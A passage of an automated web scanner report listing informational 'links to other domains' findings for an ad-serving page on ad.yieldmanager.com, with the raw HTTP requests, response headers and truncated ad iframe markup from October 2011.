Sko4Dvy2TY3V-y98-uW.R963jMwQvbEvTmKNUAdKuaAQhdW.F4MqAtrGlh1MmornA8TqCD.VE3qpSW-TMYWi5yi8umU6Y.mGMjdX1ofupcmUOhjLKGSgvruAF3gHQH,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601667_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601667_HERE" border="0" alt=""></a>
...[SNIP]...
19.18. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACsz19lx-DRCsq9vQINTVwfVXVwN9yiEvjgBMrqAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1723399548%26r%3D0%26s%3D2126909,664ac854-ed53-11e0-9884-8b6cf07408de,1317600327535 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:05:28 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0310.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:05:28 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317600327_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGlT11rgzAU.TW-SUiMn8getJlD1tgV7Mb6IjHGxrUaFx2V.vqFWfoHdrnce87h3AMX4ThgrIUMR57wEeO1GyPs8ABFQS0CG8ZxjKETIMf17SlPm4QgmCebZ-7vk78iEXldkZkkTPZqZW9hAq4EAFdpel2lbxr
...[SNIP]...
c9JRxSIs.H-0vm.sm25TyPFk4sJzPdgFmzRixAjWJYAFe9EVmrwSiNKdOi1WKSFiYutBz.pgbRNYb5HowM57XB3TAJPVeaDY3qq-Gnr4WupNDCGC6KG8cvORRylQ==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600327_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317600327_HERE" border="0" alt=""></a>
...[SNIP]...
19.19. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADbOeTa6OTRCv8si9N8kXiR0EpX1AjVZlwsax1SAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D2714874675%26r%3D0%26s%3D2126909,dc68cc3c-ed55-11e0-9a32-78e7d1f5c9bc,1317601384697 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:06 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0056.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:23:06 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601384_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGlTstugzAQ.Bpu1LKxeQn1AKFUqAE1FW1ELojYToAApoYqlK-PVaL8QFer3ZnR7GgR9iCBGNmmY1guJZhRD2GD2obr8pLo0PM8bNrEhgjZhj7GAfNDBGN.80Ktnf9XoRu-rUjN0PF3YmXvjg-uIQBEyOS6St-
...[SNIP]...
7JPkf50tb5.U91.6zr1TQNGvY1I1LNwCRLxmcgBt7PgIpOieVJgqFSpkjyk-RjpeGQQM2wFtHzmilmmdBVnB4VrvuRy6mQZc9EV.Q.3ZHLouKSK0MrqHLcAG8-c6A=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601384_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601384_HERE" border="0" alt=""></a>
...[SNIP]...
19.20. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABdO3UpUuXRCtH41YeIIIYVhQXJm.UUgBfjPNRwAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1015001637%26r%3D0%26s%3D2126909,1b9da9a4-ed56-11e0-b550-78e7d1f5c928,1317601490740 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:24:51 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0045.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:24:51 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601490_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTctugzAQ.BpuyPIrPIR6MHGRUEPSVKQovSBsTEEEnDpUSfP1dUvFD3S12p0Zzc4iEokQS7zyVwQiSkUTRohg6WNBhN-4MIoi3yM0RBAH7iWNa8YRTNm6kN6e.RYP-dOM7OQB26czew4YuHIAqDbZdZY-sgA
...[SNIP]...
zus-KIjvf-a7ccsgfXbafp7BDm4MR2DSZT1eoG9FmNNyD1YMWqMeDcWlNiVGPUpXUIp9DB3l2Pqqst81boh0thcTdelJlKU421HsrxcxDKlK0yyhpOWlrHNzVTcxM=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601490_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601490_HERE" border="0" alt=""></a>
...[SNIP]...
19.21. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABvw6jyduDRCg4QD1i4TzbLyWhZtF.hiieCuuvfAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D483988786%26r%3D0%26s%3D2126909,35e534ce-ed53-11e0-bf34-78e7d15f8c2e,1317600246339 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:04:07 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0147.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:04:07 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317600246_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGlT11rg0AQ.DW-yXEfagzSB83VIM2lDdiU-iJ6d1Yb9expifXX96ghf6DLsjszzA4sIgEkriDc2Xol5G7l-QEimG-QTyoH2TAIAuxh7Lp4A317TCIRUgSTcPfIvVP4V3RLn1ZkJvXDk1rZix-CKwXAUZpdV-m
...[SNIP]...
HpuXves5.s9pK5f7DtepoGi4QWjk0LMOlCyBmoQfYz4KozYlFpMNTGFGtZaTnWFqEOtLC3qF42wjDPhVvDeWlw049ST7kueqG6vP.uSqnzWmppDK3ixvELaqNzOw==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600246_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317600246_HERE" border="0" alt=""></a>
...[SNIP]...
19.22. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADrPTHAKuXRCrRs-F0rhsku0Gj1Ru284H.9wuMPAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D674281344%26r%3D0%26s%3D2126909,03954f4c-ed56-11e0-8f97-78e7d16291d6,1317601450420 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:24:10 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0058.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:24:10 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601450_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTUFugzAQfA03ZBlwCAj1YGIh0YakqdxG4YKIbUogYGJcheb1dUuUD3S12p0Zzc46XlQhzlAYBmXlVRw6fuR4Llu6ZVgKYcMoMtxfBhChBbTHNOaYODDFqz3zd.ivSEheZmQmCfAundlrgMGVAICkyq6zdMk
...[SNIP]...
e8zejhe0uTdnPPMfdPtl1rPVgettzENAdalVxMQA6inwCTnRHLSoGhNqZEiUqJsbY8gqDl-jfZixM3zF84v5wdDT71o1C6UGXPZVf0X91RqKIWShjDWTLj-AHacXQ9,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601450_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601450_HERE" border="0" alt=""></a>
...[SNIP]...
19.23. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB9iqfco-XRCho0v64L3BCG3gTMyQdRQv3hcKiaAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2023593981%26r%3D0%26s%3D2126909,4bb2c796-ed56-11e0-aee5-78e7d1f5283c,1317601571409 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:26:12 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0140.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:26:12 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601571_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTttugzAM.RreUJSES0FoD6FRJbZSrRMdoy-oTdLSC4QFpiK-fu6o-gOzLPsc6.jYxIl86QUChwfpeXtMZ0FEHCpmkL4kNo6iiNKQzjAUbHdJLBknOGHzXPhr9hc85G8TgsoDtk4m9h4wdOMIudqkt2n0nQb
...[SNIP]...
0mL2lekPR8HIvHn7D.YttV37eWwyy6gJSoNzupBqRb1QxI6BqGu4NBbQWihVEHo7rKcriLLeqPulEnCcz3yJ2LPeBT0ynTl2bXSF2XzU-9V6aslFEguGoBil.KdnOh,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601571_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601571_HERE" border="0" alt=""></a>
...[SNIP]...
19.24. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH69wUQOHRCv9MHx.3PKFz3fZJ9-fCzQ0g9tFzAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D3225121083%26r%3D0%26s%3D2126909,ae6958ee-ed53-11e0-a045-78e7d16242a4,1317600448532 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:29 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0361.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:07:29 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317600448_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljN1OhDAQhZ-GO9K05WchxIuylQ26RTcha.SGQFtk5adYMIv79DZieAEnk5nvTM4c5ERyh2vIPeFBWEEkcYQczHeo8pw6tGEURRhBHDrYC1x7SmNBKIIp2d9z.0R-i4b0cSUzaUBOalXPAQFXCoCrNLuup08
...[SNIP]...
loWf76ndGHJtseyZ1tN.M8Wg6xcGJagFmXQi5AjXJYAFe9OZa1BmNjTImWtZZTYznUhRb2b2qQF2GU78HQaF4ZvgyT1HOhy0Govhi--krqopFaGkOnuHH8AHUvcuY=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600448_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317600448_HERE" border="0" alt=""></a>
...[SNIP]...
19.25. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4DO22ieTRCiOMa5z1rlqYYUPPtX1VmeU.ja22AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3184333582%26r%3D0%26s%3D2126909,a3cc6f28-ed55-11e0-9781-5fce54d5fb11,1317601289720 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:21:30 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
